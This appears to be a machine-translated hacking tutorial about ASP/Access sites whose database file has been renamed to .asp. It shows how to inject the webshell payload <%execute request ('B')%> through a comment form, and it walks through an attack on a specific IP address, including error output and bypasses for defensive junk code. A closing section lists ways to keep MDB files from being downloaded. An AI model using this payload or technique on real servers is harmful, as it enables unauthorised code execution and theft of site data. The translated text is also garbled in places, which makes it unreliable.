Do not say directly to change the suffix, directly can use the net fast and other tools to download directly, in fact, so you have opened the door for intruders. Intruders can use Asp/asa as a suffix database to get Webshell directly.
one. Ideas
We all know that <%%> is an ASP file identifier, that is, an ASP file will only go to execute the code between <%%>, all the data of the access+asp Web system are stored in the database file (MDB file), Since the manager changed the MDB file to an ASP file, if the data we submitted contains <%%>, we will execute the code between <%%> when we visit the ASP database. This causes us to submit only malicious code to the database, then the ASP suffix database is our Webshell.
two. Example
Casually find a target, first we Bauku, see is not the ASP suffix database: http://220.170.151.103/test/dlog%5cshowlog.asp?cat_id=5&log_id=210
Return:
Copy Code code as follows:
Microsoft VBScript Compiler error ' 800A03F6 '
Missing ' End '
/iishelp/common/500-100.asp, Line 242
Microsoft JET Database Engine error ' 80004005 '
' D:\log_mdb\%29dlog_mdb%29.asp ' is not a valid path. Determine if the path name is spelled correctly, and whether to connect to the server where the file is stored.
/test/conn.asp, Line 18
We submit: http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp return a heap of garbled, so that we can directly use the Internet and other tools to download the database directly (here we do not discuss). We go back to the homepage to see the "User Comments" feature available. We register a user, send a comment:
<%execute request ("B")%>
So we put the ASP code: <%execute Request ("B")%> written to the database, then the database: is our Webshell slightly. Submit: Http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp at the end of the garbled we see:
Copy Code code as follows:
/iishelp/common/500-100.asp, Line 242
Microsoft VBScript run-time error ' 800a000d '
Type mismatch: ' Execute '
/test/dlog/log_mdb/%29dlog_mdb%29.asp, line 1266
Note: When we submit code to the database, the code content cannot be too large. So we use <%execute request ("B")%>.
three. Some other questions and ideas
1. For the conversion of the suffix to ASP, but also to the database to add <%= ' a ' -1%> and other illegal ASP code to completely prevent the download of the database, because there are illegal ASP code, insert our Webshell code after the run, will only show the previous illegal code error, Instead of executing our shell code. Although this can prevent a certain attack, but there is a certain hidden trouble, we just in the wrong code before adding compatible error code, you can get the correct display of the execution of our inserted Webshell code.
2. For the suffix is not changed, that is, MDB files, so we can download directly down to get the background password, into the background, you can use the database backup to change the suffix for ASP.
Summary of MDB anti-download method
1: Under IIS6 If an extension is not defined, there are 404 errors that are not found when the file is accessed.
So you can name the database arbitrarily as a file name that never appears, and you can achieve security effects such as: xxxxx.xxxxxxxxxxx
2 The database on the outside of the site, it is absolutely not access to get. For example: e:/web/is your website
Then put the database in the e:/
3 As I said upstairs, convert. mdb to. asp pour in a special table containing <% binary characters so access to the file prompts for a missing script shutdown.
4 or change the. mdb to. asp to open with Winhex can also be found 176 after a very long 00 strings you just change it into a section of ASP code can also be implemented to prevent downloading, which does not affect database functionality. For example:
<%
Response.Write ("Illegal access")
Response.End ()
%>
Now add "#" to the name of the database and the spaces are cracked like "#" = "<%35" and space = "<%20"
So it's no use doing that now.
If it's your own server, set it up in IIS:
Create a new, blank DLL file, and then add a map to IIS, select the DLL you just built, and populate it with the extension. mdb, restart the IIS service after saving.
